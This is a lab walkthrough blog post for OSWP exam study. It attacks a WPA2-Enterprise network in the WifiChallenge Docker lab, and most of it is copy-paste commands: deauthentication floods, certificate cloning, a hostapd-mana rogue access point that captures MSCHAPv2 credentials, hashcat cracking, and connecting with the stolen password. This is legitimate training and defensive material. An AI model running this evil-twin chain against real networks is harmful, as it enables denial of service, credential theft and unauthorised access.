Practical study material OSWP Part 2: WPA2-MGT Walkthrough
The article shows how to set up the environment with the WifiChallenge Lab, capture WPA2-MGT handshake traffic, extract the certificate information, create a rogue AP, crack the password with the usual tooling and connect to the target network. 2025-6-10 06:50:44 Author: infosecwriteups.com (view original)

Nol White Hat

Summary

This blog post is the second of a series of three that serve as preparation for the OffSec Wireless Professional (OSWP) exam. It is a complete walkthrough of the WPA2-MGT challenge in the WifiChallenge Lab. Parts 1 and 3 cover WPA2-PSK and WEP.

Disclaimer

This article is for informational and educational purposes only, for readers who are willing and curious to learn about security and penetration testing. It contains no information or examples from the actual OSWP exam, but it does provide a framework you can use to your advantage. The content may not be used for illegal purposes. If you are ready to learn something new for the good, read on.

Why this blog?

There are a number of very good articles on study material for the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the GitHub page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).

Based on the two articles mentioned above, I have created an easy walkthrough for the WPA2-MGT scenario. It contains easy ‘copy-pastables’, set up so that you only need to change the values of the required variables. This reduces errors and is much more efficient.

We will use the challenges from the WifiChallenge Lab (https://lab.wifichallenge.com/). This particular article is about the WPA2-MGT challenge.

Lab environment

This PoC consists of a single machine: a Kali attacker box running the latest Docker installation of WifiChallenge Lab version 2.1. In addition we need to install two tools: FreeRADIUS (only for the certificate generation scripts it ships with) and hostapd-mana.

I will not explain how to install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/

Create the WifiChallenge Lab Docker environment and install additional tools

1. Open a command terminal and copy and paste the commands below (prefix the docker command with sudo if your user is not in the docker group):

cd /opt
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up

The required Docker containers should be up and running in about 5 minutes.

2. Check if all 4 WifiChallenge Lab Docker containers are running.

docker container ls

3. Check that Kali now shows new (virtual) Wi-Fi interfaces.

iwconfig | grep wlan

4. Install FreeRADIUS (we only need the certificate Makefile and OpenSSL templates it ships with to create the certificates for our rogue access point; the RADIUS daemon itself is not used).

sudo apt install freeradius

5. Install hostapd-mana (this tool runs the rogue access point and logs the captured credentials).

sudo apt install hostapd-mana

Part 1: Enumerate Wifi networks and select a target WPA2-MGT Access Point (AP) to attack

6. Kill processes that may cause problems with airmon-ng (such as NetworkManager). Copy and paste the command below and press enter:

sudo airmon-ng check kill

7. Set wlan0 in monitor mode:

sudo airmon-ng start wlan0
Note the new interface name: wlan0mon.

8. Check which access points are active on the 2.4 GHz and 5 GHz bands.

sudo airodump-ng  --band abg wlan0mon

Results:

We detected 4 access points configured as WPA2-MGT (ENC WPA2, CIPHER CCMP, AUTH MGT). All of them transmit on channel 44 (see the ‘CH’ column).

9. Check the APs that are transmitting on channel 44.

channel=44
sudo airodump-ng -c ${channel} wlan0mon

In this walkthrough we will attack the Wi-Fi network “wifi-corp”. It is served by two access points (two BSSIDs sharing the same ESSID), and we found two stations associated with it.

Results:

ESSID = wifi-corp

BSSID = F0:9F:C2:71:22:1A and F0:9F:C2:71:22:15 (two APs, same ESSID)

Station 1 = 64:32:A8:07:6C:40

Station 2 = 64:32:A8:07:6C:41

Part 2: Capture handshake

In this part we capture the authentication traffic of a client. For WPA2-MGT the interesting material is not the 4-way handshake itself but the EAP exchange that precedes it: the RADIUS server sends its certificate chain in the clear inside the EAP-TLS/PEAP messages, and later we will read the certificate details out of the capture.

10. Open a new terminal tab. Start monitoring the AP ‘wifi-corp’ specifically and write the output to a capture file. Copy and paste the following command(s):

channel=44
dumpfile='/tmp/dump-wpa-mgt'
bssid='F0:9F:C2:71:22:1A'
essid='wifi-corp'

sudo rm -f /tmp/dump-wpa-mgt-01*
sudo airodump-ng -c ${channel} -w ${dumpfile} --output-format pcap --essid ${essid} --bssid ${bssid} wlan0mon

11. Open a second terminal tab. Send a deauthentication frame to the broadcast address so that every connected client re-authenticates while we are capturing. Copy and paste the following command(s):

essid='wifi-corp'
sudo aireplay-ng -0 1 -e ${essid} wlan0mon

Return to terminal 1 and check whether a WPA handshake was captured.

airodump-ng shows “WPA handshake: <BSSID>” in the top right corner. The server certificate travels inside the EAP exchange before the 4-way handshake, so even if the indicator does not appear, the capture may already contain what we need; step 14 will tell.

12. Press Ctrl+C to stop airodump-ng. Stop monitoring on wlan0mon:

sudo airmon-ng stop wlan0mon
Note that interface wlan0 is back in managed mode.

Part 3: Extract the server certificate details

In this part we extract the subject information of the CA and server certificates the RADIUS server presented. We cannot obtain the private key, so we cannot reuse the certificate itself; instead we clone its distinguished-name fields so that the certificate of our own (rogue) AP looks identical to a client that checks the name but not the chain.

13. Check that your capture file (containing the authentication exchange) is present.

ls -l /tmp/dump-wpa-mgt*

14. Use tshark to extract the certificate subject information from the capture file. tshark reassembles the EAP fragments, so the filter matches the frame that carries the complete certificate chain; each rdnSequence line holds one full distinguished name.

dumpfile='/tmp/dump-wpa-mgt'
bssid='F0:9F:C2:71:22:1A'

tshark -r ${dumpfile}-01.cap -Y "wlan.bssid == ${bssid} && eap && tls.handshake.certificate" -V | grep rdnSequence: -A 1 | head -n 5

Notice that the output contains two distinguished names: the issuer (the CA certificate) and the subject (the server certificate).

We gathered the following information (the e-mail addresses are redacted in the published article and appear as “[email protected]”):

CA (issuer):

emailAddress = [email protected]
commonName = WiFiChallenge CA
organizationalUnitName = Certificate Authority
organizationName = WiFiChallenge
localityName = Madrid
stateOrProvinceName = Madrid
countryName = ES

Server (subject):

emailAddress = [email protected]
commonName = WiFiChallenge CA
organizationalUnitName = Server
organizationName = WiFiChallenge
localityName = Madrid
countryName = ES

Part 4: Create certificates based on the target AP certificate information

In this part we use the extracted certificate details to create our own CA and server certificates with matching names. We do this with the certificate Makefile and OpenSSL configuration files that ship with FreeRADIUS.

15. Modify the default FreeRadius CA certificate. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

cd /etc/freeradius/3.0/certs
sudo nano /etc/freeradius/3.0/certs/ca.cnf

16. Scroll down to the section [certificate_authority] and replace the default CA information with the values from step 14 (tshark). The default section has no organizational unit; add an organizationalUnitName line if you also want to reproduce “Certificate Authority”.

[email protected]
commonName= "WiFiChallenge CA"
organizationName= WiFiChallenge
localityName=Madrid
stateOrProvinceName=Madrid
countryName=ES

17. Press Ctrl+O, Enter, then Ctrl+X to save the file and leave nano.

18. Modify the default FreeRadius Server certificate configuration file. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

cd /etc/freeradius/3.0/certs
sudo nano /etc/freeradius/3.0/certs/server.cnf

19. Scroll down to the section [server] and replace the default server certificate information with the values from step 14 (tshark). The captured server certificate has no stateOrProvinceName, so comment out that line in server.cnf if you want an exact match; otherwise the default value ends up in your certificate.

[email protected]
commonName= "WiFiChallenge CA"
organizationName= WiFiChallenge
localityName= Madrid
countryName=ES

20. Press Ctrl+O, Enter, then Ctrl+X to save the file and leave nano.

21. Generate the new certificates. You need root for this (the certificate directory is owned by root). Copy and paste the following command(s):

# become root
sudo su -

# in the root shell: regenerate the Diffie-Hellman parameters hostapd-mana will use
# (2048-bit dhparam generation takes a while), then build the certificates
cd /etc/freeradius/3.0/certs
rm -f dh
openssl dhparam -out dh -2 2048
make

Note: make rebuilds ca.pem and server.pem because they depend on the .cnf files you just edited. If the directory already holds certificates from the package install or a previous run and make stops with a TXT_DB error about an existing certificate with the same subject, run make destroycerts and then make again. The client certificate error at the end can be ignored (we do not use the client certificate).
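As an added check (example code, not from the article or the WifiChallenge Lab project), the script below does the same job as steps 15 to 21 directly with openssl: it generates a CA and a server certificate carrying the distinguished names from step 14 and then verifies, before you hand the files to hostapd-mana, that the server certificate chains to the rogue CA and carries the cloned OU/CN values. The e-mail addresses are placeholders because the article redacts them, and an openssl binary on the attacker box is assumed. If you use this output instead of make, point ca_cert, server_cert and private_key in the hostapd-mana config at the output directory, drop private_key_passwd (the key has no passphrase) and generate dh separately as in step 21.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): clone the CA and server DNs
# extracted in step 14 with plain openssl and verify the result.
# Assumptions: openssl is installed; the e-mail addresses below are
# placeholders for the values the article redacts.
set -eu

CA_SUBJ="/C=ES/ST=Madrid/L=Madrid/O=WiFiChallenge/OU=Certificate Authority/CN=WiFiChallenge CA/emailAddress=ca@example.invalid"
SERVER_SUBJ="/C=ES/L=Madrid/O=WiFiChallenge/OU=Server/CN=WiFiChallenge CA/emailAddress=server@example.invalid"

# make_rogue_certs DIR: writes ca.pem, ca.key, server.pem and server.key into DIR.
make_rogue_certs() {
    dir="$1"
    mkdir -p "$dir"
    # self-signed CA with the cloned issuer DN
    openssl req -x509 -new -nodes -newkey rsa:2048 -sha256 -days 365 \
        -subj "$CA_SUBJ" -keyout "$dir/ca.key" -out "$dir/ca.pem" 2>/dev/null
    # server key and CSR with the cloned subject DN, signed by the rogue CA
    openssl req -new -nodes -newkey rsa:2048 -sha256 \
        -subj "$SERVER_SUBJ" -keyout "$dir/server.key" -out "$dir/server.csr" 2>/dev/null
    openssl x509 -req -in "$dir/server.csr" -CA "$dir/ca.pem" -CAkey "$dir/ca.key" \
        -CAcreateserial -sha256 -days 365 -out "$dir/server.pem" 2>/dev/null
}

# cert_dn FILE subject|issuer: print one DN of a PEM certificate on a single line.
cert_dn() {
    openssl x509 -in "$1" -noout "-$2" -nameopt oneline
}

# check_clone DIR: 0 when server.pem chains to ca.pem and both DNs carry the
# cloned OU and CN, 1 otherwise (do not start the rogue AP with a bad clone).
check_clone() {
    dir="$1"
    openssl verify -CAfile "$dir/ca.pem" "$dir/server.pem" >/dev/null 2>&1 || return 1
    cert_dn "$dir/server.pem" subject | grep -q 'OU = Server' || return 1
    cert_dn "$dir/server.pem" subject | grep -q 'CN = WiFiChallenge CA' || return 1
    cert_dn "$dir/server.pem" issuer | grep -q 'OU = Certificate Authority' || return 1
}

# Usage: ./rogue-certs.sh /tmp/rogue-certs
if [ $# -eq 1 ]; then
    make_rogue_certs "$1" && check_clone "$1" && echo "certificates OK in $1"
fi
```

The verify step is the one that matters on the exam: a typo in the CN is invisible in hostapd-mana's log, but a client that matches the server name would silently refuse to connect.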

Part 5: Use hostapd-mana to set up a rogue access point

22. Create an eap-user file to use with hostapd-mana. Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

# create a eap-user file (/tmp/mana.eap_user)
cat << EOF > /tmp/mana.eap_user
* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2]
EOF

23. Create the hostapd-mana config file (/tmp/network.conf). Open a (Bash) terminal tab. Use copy and paste to execute the following command(s) in the command terminal:

essid='wifi-corp'

cat << EOF > /tmp/network.conf
# SSID of the AP
ssid=${essid}

# Network interface to use and driver type
# We must ensure the interface lists 'AP' in 'Supported interface modes' when running 'iw phy PHYX info'
interface=wlan0
driver=nl80211

# Channel and mode
# Make sure the channel is allowed with 'iw phy PHYX info' ('Frequencies' field - there can be more than one)
# The target runs on channel 44 (5 GHz); clients roam by SSID, so a 2.4 GHz rogue AP on channel 1 works in the lab.
# If the interface supports it, hw_mode=a with channel=44 mirrors the target band more closely.
channel=1
# Refer to https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf to set up 802.11n/ac/ax
hw_mode=g

# Setting up hostapd as an EAP server
ieee8021x=1
eap_server=1

# Key workaround for Win XP
eapol_key_index_workaround=0

# EAP user file we created earlier
eap_user_file=/tmp/mana.eap_user

# Certificate paths created earlier
ca_cert=/etc/freeradius/3.0/certs/ca.pem
server_cert=/etc/freeradius/3.0/certs/server.pem
private_key=/etc/freeradius/3.0/certs/server.key

# The password is actually 'whatever'
private_key_passwd=whatever
dh_file=/etc/freeradius/3.0/certs/dh

# Open authentication
auth_algs=1

# WPA/WPA2
wpa=3

# WPA Enterprise
wpa_key_mgmt=WPA-EAP

# Allow CCMP and TKIP
# Note: iOS warns when network has TKIP (or WEP)
wpa_pairwise=CCMP TKIP

# Enable Mana WPE
mana_wpe=1

# Store credentials in that file
mana_credout=/tmp/hostapd.credout

# Send EAP success, so the client thinks it's connected
mana_eapsuccess=1

# EAP TLS MitM
mana_eaptls=1
EOF

24. Next, start the rogue access point on wlan0 (the interface is back in managed mode since step 12, and NetworkManager was stopped in step 6 so it will not interfere):

sudo ifconfig wlan0 down 
sudo ifconfig wlan0 up
sudo hostapd-mana /tmp/network.conf

Part 6: Force the target clients to connect to our rogue access point

If our rogue access point transmits with more power than the target access points, we can just sit and wait for a victim station to connect. We may not always be that lucky.

Alternatively, we can force the existing stations onto our rogue access point with a denial of service: a constant stream of deauthentication frames against all target access points. It is important to run this simultaneously against every access point of the same Wi-Fi network (‘wifi-corp’), so that our access point is the only one left to roam to.

25. Use aireplay-ng to deauthenticate the clients of the first target access point. We inject from the second virtual interface, wlan1, so that wlan0 stays free for the rogue AP. aireplay-ng can only inject from an interface in monitor mode on the target's channel, so put wlan1 in monitor mode first (for example with sudo airmon-ng start wlan1 44) and substitute the resulting interface name (wlan1mon on current Kali) in the commands below if it differs. Open a second (Bash) terminal tab and execute:

bssid='F0:9F:C2:71:22:1A'
essid='wifi-corp'

sudo aireplay-ng -0 0 -e ${essid} -a ${bssid} wlan1

26. Use aireplay-ng to deauthenticate the clients of the second target access point as well. Open a third (Bash) terminal tab and execute:

bssid='F0:9F:C2:71:22:15'
essid='wifi-corp'

sudo aireplay-ng -0 0 -e ${essid} -a ${bssid} wlan1

Return to terminal 1 and check whether a victim station has connected.

Two stations tried to connect to our rogue access point. The first one refused our certificate: its supplicant validates the RADIUS server certificate against a configured CA, our cloned CA is not trusted, and the TLS handshake was aborted with:

SSL: SSL3 alert: read (remote end reported an error):fatal:unknown CA

OpenSSL: openssl_handshake — SSL_connect error:0A000418:SSL routines::tlsv1 alert unknown ca

The second station accepted the certificate without validating it, completed the inner EAP-MSCHAPv2 exchange with our server, and hostapd-mana logged the challenge/response pair in both John the Ripper and hashcat format. Strictly speaking this is not a NetNTLM hash but an MSCHAPv2 challenge/response; hashcat's NetNTLMv1/MSCHAPv2 mode (-m 5500) covers it because both responses are DES encryptions of the challenge under keys derived from the user's NT hash. Cloning the certificate names only matters for clients that check the server name but not the chain; a client that pins the CA, like the first station, is not fooled by it.

27. Optional: Press Ctrl+C to stop the rogue access point.

We gathered the following information:

MANA EAP Identity Phase 1: CONTOSO\juan.tr

MANA EAP EAP-MSCHAPV2 JTR | juan.tr:$NETNTLM$95bf6ccfec26252d$a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:::::::

MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d
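hostapd-mana also writes every captured credential to the file named by mana_credout (/tmp/hostapd.credout in our config). With several clients, or a client that reconnects a few times, that file fills up with repeated and occasionally truncated entries. The helper below is an added example, not part of the article or of hostapd-mana: it pulls the HASHCAT lines out of such a file, checks the field lengths (8-byte challenge, 24-byte response), keeps one line per user, and can convert a JTR line into hashcat form. It assumes the credout file uses the same “MANA EAP ... | ” prefix as the console output; the sample file it writes is constructed for the demo, with the juan.tr lines taken from the output above and the other users made up.

```shell
#!/usr/bin/env bash
# Added example, not from the original article: turn a hostapd-mana credout
# file into a clean hashcat -m 5500 input. Assumption: the credout file holds
# the same "MANA EAP ... | " lines as the console.
set -eu

# is_hex STRING LEN: true when STRING is exactly LEN hex characters.
is_hex() {
    [ "${#1}" -eq "$2" ] || return 1
    case "$1" in *[!0-9a-fA-F]*) return 1 ;; esac
    return 0
}

# validate_hashcat_line 'user::::response:challenge'
# A valid 5500 line has a 24-byte (48 hex) response and an 8-byte (16 hex) challenge.
validate_hashcat_line() {
    line="$1"
    user=${line%%::::*}
    rest=${line#*::::}
    resp=${rest%%:*}
    chal=${rest#*:}
    [ -n "$user" ] && [ "$user" != "$line" ] && is_hex "$resp" 48 && is_hex "$chal" 16
}

# jtr_to_hashcat 'user:$NETNTLM$challenge$response:::::::'
# -> 'user::::response:challenge' (the two tools only order the fields differently)
jtr_to_hashcat() {
    line="$1"
    user=${line%%:*}
    rest=${line#*\$NETNTLM\$}
    chal=${rest%%\$*}
    resp=${rest#*\$}
    resp=${resp%%:*}
    printf '%s::::%s:%s\n' "$user" "$resp" "$chal"
}

# credout_to_hashcat FILE: print the valid hashcat lines, one per user.
credout_to_hashcat() {
    sed -n 's/^MANA EAP EAP-MSCHAPV2 HASHCAT | //p' "$1" |
    while IFS= read -r line; do
        validate_hashcat_line "$line" && printf '%s\n' "$line"
    done | sort -u -t: -k1,1
}

# write_sample_credout FILE: constructed demo input. The juan.tr lines repeat
# the article's capture; ana.lp and bob.sm are made up, and ana.lp's response
# is deliberately truncated to show the validation at work.
write_sample_credout() {
    cat > "$1" <<'EOF'
MANA EAP Identity Phase 1: CONTOSO\juan.tr
MANA EAP EAP-MSCHAPV2 JTR | juan.tr:$NETNTLM$95bf6ccfec26252d$a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:::::::
MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d
MANA EAP Identity Phase 1: CONTOSO\juan.tr
MANA EAP EAP-MSCHAPV2 HASHCAT | juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d
MANA EAP Identity Phase 1: CONTOSO\ana.lp
MANA EAP EAP-MSCHAPV2 HASHCAT | ana.lp::::deadbeef:1122334455667788
MANA EAP Identity Phase 1: CONTOSO\bob.sm
MANA EAP EAP-MSCHAPV2 HASHCAT | bob.sm::::0123456789abcdef0123456789abcdef0123456789abcdef:1122334455667788
EOF
}

# Usage: ./credout2hashcat.sh /tmp/hostapd.credout > /tmp/hashcat.txt
if [ $# -eq 1 ]; then
    credout_to_hashcat "$1"
fi
```

Feed the output straight to hashcat as in the next part; the de-duplication keeps hashcat from reporting the same user several times, and the length check drops partial lines that would otherwise make it reject the whole file.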

Part 7: Crack the captured MSCHAPv2 challenge/response with hashcat

We will use hashcat to crack the challenge/response we captured, using the hashcat-format line (mode 5500, NetNTLMv1/MSCHAPv2).

28. Download rockyou.txt. Note: on the OSWP exam, the John the Ripper wordlist ‘/usr/share/john/password.lst’ is good enough.

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O /tmp/rockyou.txt

29. Use hashcat to crack the captured challenge/response. The --force flag only suppresses hashcat's warnings about an unsupported or virtualised OpenCL device; once a run has finished, hashcat --show -m 5500 /tmp/hashcat.txt reprints the cracked entry from the potfile. Copy and paste the following command(s):

echo -n  juan.tr::::a20d33a6d69754cb550ce451d41ddb5c4d6794dab01e230a:95bf6ccfec26252d > /tmp/hashcat.txt
wordlist='/tmp/rockyou.txt'
hashcat -a 0 -m 5500 /tmp/hashcat.txt ${wordlist} --force

Result:

We recovered the password of domain user juan.tr: ‘bulldogs1234’. Note that this is the user's own (domain) password, not a network-wide WPA2 key: with WPA2-Enterprise every user authenticates with individual credentials, and the pairwise keys are derived per session.

Part 8: Connect to the target network

In this final section we connect to the target network with the recovered credentials and download the proof.txt file.

30. Create a wpa_supplicant network configuration file with the recovered credentials. Copy and paste the following command(s) in the command terminal:

user_pass='bulldogs1234'
id='CONTOSO\juan.tr'
essid='wifi-corp'

cat << EOF > /tmp/client.conf
network={
ssid="${essid}"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="${id}"
password="${user_pass}"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
EOF
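The profile above contains no ca_cert and no server-name check, so it will trust whatever RADIUS server answers, which is exactly the weakness hostapd-mana exploited against the second station in Part 6. For the attacker that is convenient; for a defender it is the finding to report. The script below is an added example, not part of the article or of wpa_supplicant: it writes the article's profile next to a hardened one that pins the CA and the server name and hides the real user name in the outer identity, and it audits any WPA-EAP profile for those settings. The CA path and the RADIUS server name are placeholders (assumptions), not values from the lab.

```shell
#!/usr/bin/env bash
# Added example, not from the original article: the article's validation-free
# profile next to a hardened one, plus a small audit for WPA-EAP profiles.
# Placeholders: the CA file path and the RADIUS server name passed by the caller.
set -eu

# write_article_profile FILE ESSID IDENTITY PASSWORD: the profile from step 30.
write_article_profile() {
    cat > "$1" <<EOF
network={
ssid="$2"
scan_ssid=1
key_mgmt=WPA-EAP
eap=PEAP
identity="$3"
password="$4"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
EOF
}

# write_hardened_profile FILE ESSID IDENTITY PASSWORD CA_PEM SERVER_NAME
write_hardened_profile() {
    cat > "$1" <<EOF
network={
    ssid="$2"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    # outer identity: do not hand the real user name to whoever runs the AP
    anonymous_identity="anonymous"
    identity="$3"
    password="$4"
    # only this CA may have signed the RADIUS server certificate ...
    ca_cert="$5"
    # ... and the certificate must be issued to exactly this name
    domain_match="$6"
    phase1="peaplabel=0 peapver=0"
    phase2="auth=MSCHAPV2"
}
EOF
}

# audit_eap_profile FILE: 0 when the WPA-EAP profile validates the server,
# 1 when it lacks a CA or a server-name check, 2 when it is not WPA-EAP.
audit_eap_profile() {
    f="$1"
    rc=0
    grep -q '^[[:space:]]*key_mgmt=WPA-EAP' "$f" || { echo "$f: not a WPA-EAP profile"; return 2; }
    grep -q '^[[:space:]]*ca_cert=' "$f" || { echo "$f: no ca_cert, any server certificate is accepted"; rc=1; }
    grep -Eq '^[[:space:]]*(domain_match|domain_suffix_match|subject_match)=' "$f" \
        || { echo "$f: no server name check, any certificate from that CA is accepted"; rc=1; }
    grep -q '^[[:space:]]*anonymous_identity=' "$f" \
        || echo "$f: note: the real identity is sent in the clear in the outer EAP-Identity"
    return $rc
}

# Usage: ./eap-profile.sh /tmp/client.conf
if [ $# -eq 1 ]; then
    audit_eap_profile "$1"
fi
```

Running the audit against /tmp/client.conf from step 30 prints both findings and returns 1; against the hardened profile it returns 0. The same two settings, a pinned CA and a server-name match, are what made the first station in Part 6 abort the handshake with “unknown CA”.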

31. Next, use the network configuration file with wpa_supplicant to connect to the target WPA2-MGT network. Leave it running in this tab and continue in another one. Copy and paste the following command:

sudo wpa_supplicant -i wlan0 -c /tmp/client.conf

32. Get a valid IP address on interface wlan0.

sudo dhclient wlan0 -v

33. Download the proof.txt file. On the OSWP exam the target IP address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will download the proof.txt file from target 192.168.6.1.

target=192.168.6.1
curl http://${target}/proof.txt

That was it. I hope this was useful. Good luck with the exam!

References

· https://lab.wifichallenge.com

· https://www.offsec.com/courses/pen-210/

· https://zeyadazima.com/notes/oswplaybook

· https://github.com/TheH4ck3rDude/OSWP-Exam-Notes


Source: https://infosecwriteups.com/practical-study-material-oswp-part-2-wpa2-mgt-walkthrough-d87d11a77aa8?source=rss----7b722bfd1b8d---4